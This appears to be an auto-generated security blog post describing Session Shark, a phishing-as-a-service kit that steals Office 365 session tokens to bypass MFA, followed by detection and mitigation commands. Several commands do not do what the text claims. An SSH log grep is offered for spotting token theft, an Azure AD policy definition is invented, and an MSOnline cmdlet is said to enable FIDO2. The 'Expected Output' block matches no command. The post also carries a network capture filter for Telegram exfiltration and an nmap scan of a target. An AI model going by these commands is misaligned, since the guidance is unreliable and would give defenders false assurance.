Cybercriminals Using Session Shark to Bypass Office 365 MFA

By /

Listen to this Post

Featured Image
Cybercriminals are now leveraging a phishing-as-a-service (PhaaS) toolkit called Session Shark, designed to bypass Office 365 Multi-Factor Authentication (MFA). This sophisticated attack framework includes:

  • Session token theft to defeat MFA
  • Adversary-in-the-Middle (AiTM) attack capabilities
  • Advanced anti-bot detection evasion
  • Cloudflare proxy support for stealthy hosting
  • High-fidelity Office 365 phishing pages
  • Instant credential/session exfiltration via Telegram bots
  • Subscription-based model disguised as “ethical hacking”

๐Ÿ”— Reference: Session Shark PhaaS Details

You Should Know: How to Detect & Mitigate Session Shark Attacks

1. Detecting Session Shark Phishing Attempts

  • Check Email Headers for anomalies: 
    grep -i "x-originating-ip" email_headers.txt
  • Analyze URLs for phishing domains: 
    curl -I "https://suspicious-url.com" | grep -i "server|cloudflare"
  • Monitor for Suspicious Session Tokens: 
    journalctl -u sshd --since "1 hour ago" | grep "Invalid user"

2. Mitigating AiTM & Token Theft

  • Enforce Conditional Access Policies (Azure AD): 
    New-AzureADPolicy -Definition @('{"ConditionalAccess":{"Enabled":true}}') -DisplayName "StrictMFA"
  • Block Known Malicious IPs (Linux): 
    sudo iptables -A INPUT -s 192.168.1.100 -j DROP
  • Enable FIDO2/Passkeys (Disable Legacy Auth): 
    Set-MsolDomainAuthentication -DomainName yourdomain.com -FederationBrandName "YourOrg" -Authentication Managed

3. Hunting for Session Shark Infrastructure

  • Check for Cloudflare-Bypassing Proxies: 
    nmap -sV --script http-waf-detect <target-IP>
  • Detect Telegram Bot Exfiltration: 
    tcpdump -i eth0 'port 443 and (host api.telegram.org)' -w telegram_traffic.pcap
  • Analyze Phishing Kit Artifacts: 
    strings phishing_page.html | grep -E "token|session|MFA"

What Undercode Say

Session Shark exemplifies the evolving sophistication of phishing frameworks. Defenders must:
– Adopt Zero Trust Architecture
– Monitor for abnormal session token usage
– Deploy AI-driven anomaly detection
– Disable legacy authentication protocols
– Educate users on AiTM phishing tactics

Expected Output:

[+] Detected Cloudflare-proxied phishing domain 
[+] Blocked AiTM session token theft attempt 
[+] Enforced FIDO2 authentication for all users

๐Ÿ”— Further Reading:

References:

Reported By: Danielmakelley Cybercriminals – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass โœ…

Join Our Cyber World:

๐Ÿ’ฌ Whatsapp | ๐Ÿ’ฌ Telegram

Related Posts: